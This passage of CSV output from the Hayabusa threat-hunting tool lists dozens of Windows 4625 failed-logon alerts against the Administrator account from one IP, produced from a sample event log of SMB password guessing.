NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:11.920 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
